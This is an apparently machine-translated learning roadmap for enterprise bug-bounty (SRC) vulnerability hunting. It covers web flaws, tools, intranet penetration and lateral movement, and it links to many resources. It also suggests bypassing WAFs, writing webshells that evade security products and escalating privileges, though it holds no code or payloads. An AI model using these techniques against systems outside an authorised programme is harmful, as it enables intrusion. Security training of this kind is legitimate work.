SRC Vulnerability Mining - History Record from Zero to 1

foreword

How to learn enterprise SRC vulnerability mining, there is not yet a complete knowledge system, I will share my experience here.

SRC vulnerability mining can be divided into the following seven stages

• With python, PHP and other programming foundation
• Master the principles and utilization skills of common vulnerabilities
• Understanding SRC Rules and Vulnerability Postures
• Combined Exploitation and Bypass of Vulnerabilities
• Automation Exploitation Tips
• There is a circle of communication, digging holes together to communicate and learn
• Keep learning new knowledge

The biggest confusion you have right now is as follows:

• My public welfare SRC and edusrc vulnerabilities are very popular, but once I go to the enterprise SRC vulnerability mining, I will not be able to!
• I am a novice, I have learned the basics of vulnerability and have a certain programming foundation, but I don't know how to do enterprise SRC?
• Why can't I dig a hole after digging for a long time? But the bigwigs on the leaderboard still earn tens of thousands or hundreds of thousands a month?
• I'm curious what everyone is digging, and how should I learn it?

 This article can answer the above confusion about SRC vulnerability mining. If you have any questions, please comment or chat with me privately! ! !

---

 

The first stage: have programming foundations such as python

Rookie tutorial to learn grammar: https://www.runoob.com/python/python-tutorial.html

Python language basics 50 courses: https://github.com/jackfrued/Python-Core-50-Courses

100 days from novice to master: https://github.com/jackfrued/Python-100-Days

The second stage: Master the principles and utilization skills of common vulnerabilities

Learning about common vulnerability principles and utilization skills can be learned according to the following three stages, at least the first stage must be learned

• Phase 1: Web Penetration
• Phase Two: Website Penetration
• The third stage: Intranet penetration

Learning route planning for each stage

Network Security Basic Tutorial Notes https://mp.weixin.qq.com/s?__biz=MzkwNDI0MDc2Ng==&mid=2247483680&idx=1&sn=e1666c9a4a67f1222d90780a0ed619b8&chksm=c08b4a31f7fcc327deef435a30bf c550b33b5975f2bcc18dfb2ee20683da66025c68253a4c79&token=1423804057&lang=zh_CN#rd

Phase 1: web penetration

Basic learning time: 1 week to 2 weeks:

1. Understand the basic concepts: (SQL injection, XSS, upload, CSRF, one-word Trojan horse, etc.: you can get information through Google search) to lay the foundation for subsequent WEB penetration testing.
2. Check some web penetration materials in some forums, and learn the idea of ​​a case. Every site is different, so the idea is the main one.
3. Learn the art of asking questions, and be good at asking questions if you don't understand.

Time to configure the penetration environment: 3 weeks to 4 weeks:

1. Learn about tools commonly used in penetration testing, such as (AWVS, SQLMAP, NMAP, BURP, Chinese chopper, etc.).
2. Download the backdoor-free versions of these tools and install them on your computer.
3. Understand the usage scenarios of these tools, understand the basic usage, and recommend searching for information on Google.

Infiltration actual operation time: about 6 weeks:

1. Search for actual penetration cases on the Internet, and gain an in-depth understanding of the use of SQL injection, file upload, and parsing vulnerabilities in actual combat.
2. Build a vulnerability environment test by yourself, recommend DWVA, SQLi-labs, Upload-labs, bWAPP.
3. Understand the stages of penetration testing, and what actions need to be done in each stage: for example, PTES penetration testing implementation standards.
4. Dig into manual SQL injection, find ways to bypass waf, make your own scripts.
5. To study the principle of file upload, how to truncate, double suffix deception (IIS, PHP), parsing exploits (IIS, Nignix, Apache), etc., refer to: upload attack framework
   .
6. Understand the principles and types of XSS formation, practice in DWVA, use a cms with XSS vulnerabilities, install security dogs, etc. for testing.
7. Learn about a one-sentence trojan and try to write a one-sentence dog.
8. Research privilege escalation under Windows and Linux, Google keyword: privilege escalation

Frequent visits to websites related to network security Time: ∞

1. For example: Freebuf, iChunqiu, Ananke, WeChat official accounts for security, and Google search.
2. If you encounter meaningful articles, you can repost them to your own blog. Familiar with Windows & Kali Linux System time: 2 weeks to 4 weeks
3. Understand common commands under Windows system, such as: ipconfig, nslookup, tracert, net, tasklist, taskkill, etc. 
4. Familiar with common commands of Linux system, such as: wget, mv, cd, rm, mkdir, etc. 
5. Familiar with common tools under Kali Linux system.

Learning server security configuration time: about 4 weeks

1.  Understand the basic configuration of iis under 03, 08, and 12 systems, understand the directory permissions under Win (such as iis write permissions), and build a simple site.
2. Learn about Linux's operating permissions, cross-directory, and folder permissions, learn to configure a Linux Web server, and build a simple site.
3. Use automated tools to scan established sites and use Google to learn to patch vulnerabilities.
4. Learn to patch, iptables limit ports, add rules, etc.
5. Download a waf software and be familiar with its use.

Time to learn some programming knowledge: about 8 weeks

1. Learn the basics of html, php, and database on w3cschool. It is recommended to learn the eighth section of each one.
2. Learn Python (other languages ​​are also possible, but python is highly recommended). Requirements to learn: crawlers (basic), multi-threading, file operations, regular expressions (basic) and some commonly used third-party libraries, you may need to install pip.
3. Use python to write a simple poc or exp.
4. Develop some programs that will be used in infiltration, such as: port scanning, etc.
5. Choose a php framework to learn, don't go too deep.

Learning code audit time: 4 weeks to 6 weeks

1. Learn about static and dynamic methods of code auditing and understand how to analyze programs.
2. Find the open source vulnerability program in Wuyun mirror, follow the learning analysis method, and try to analyze the code 3~5 times by yourself.
3. Understand the causes of web vulnerabilities and be familiar with common vulnerability functions.

Security system development time: ∞

1. Develop some security tools and open source them, which can be hosted on Code Cloud or github to show your personal strength.
2. Establish your own set of security systems with independent thinking methods.

Phase Two: Website Penetration

You can learn about Liangshen Sharing https://github.com/Micropoor/Micro8

The third stage: Intranet penetration

Intranet penetration self-study route guide

No.1 Basics

https://daiker.gitbook.io/windows-protocol/ [windows authentication knowledge]

https://github.com/l3m0n/pentest_study【Domain environment construction, port forwarding and other knowledge】

https://xz.aliyun.com/t/6349 [Port forwarding, mapping, proxy for intranet penetration]

https://gorgias.me/2018/04/04/Data forwarding skills in penetration/【SSH, ICMP, DNS and other tunnel establishment knowledge】

No.2 Advanced

https://github.com/Paper-Pen/GatherInfo【Intranet information collection】

https://www.anquanke.com/post/id/92646【Domain Penetration】

http://rinige.com/index.php/archives/625/ [Positioning technology for intranet information collection]

http://dwz.date/x47【Lateral movement】

https://www.secshi.com/21502.html [Working group penetration]

No.3 Advanced

https://xz.aliyun.com/t/2354 [Intranet security inspection/penetration summary]

https://lab.pentestit.ru/【Foreign intranet shooting range】

http://vulnstack.qiyuanxuetang.net/vuln/ [Domestic Intranet Shooting Range (produced by Hongri Security)]

https://github.com/PowerShellMafia/PowerSploit [powershell framework, it is best to learn a powershell syntax by yourself]

https://github.com/Ridter/Intranet Penetration Tips【Intranet Penetration Tips】

 

Phase 3: Understanding SRC Rules and Vulnerability Postures

3.1 Understanding of SRC rules

Learn directly through SRC announcements, for example, let’s take a certain SRC announcement as an example.

3.1.1 Understand the red line of SRC vulnerability mining

Never touch the red line, don't break the law and discipline, and be a good law-abiding citizen.

 3.1.2 Understand the scope of SRC vulnerability collection

3.1.2 Understanding SRC Vulnerability Rating 

 

3.2 Leakage Posture Skills Learning

You can take a look at Teacher Wanli’s logic vulnerability mining skills at station B: https://www.bilibili.com/video/BV1uc411H7Pd/?spm_id_from=333.337.search-card.all.click

Stage Four: Automation Exploitation Skills

After getting familiar with manual vulnerability mining, you need to improve your own vulnerability mining efficiency. At this time, programming foundation is necessary. In the early stage, you can learn the automatic vulnerability mining plug-ins and tools that big guys have open source. Later, you can try to write burp by yourself .

Start with the plug-in to improve your own automated vulnerability mining.

The fifth stage: There is a circle of communication to dig holes together to communicate and learn

Everyone knows that SRC vulnerability mining technology is also improving. At the same time, in the process of doing vulnerability mining by yourself, it is easy to feel slack. If you can have friends and a circle to do vulnerability mining together, you will make progress together and share experiences together. .

The sixth stage: continuous learning of new knowledge

You can visit more places such as communities and blogs to learn.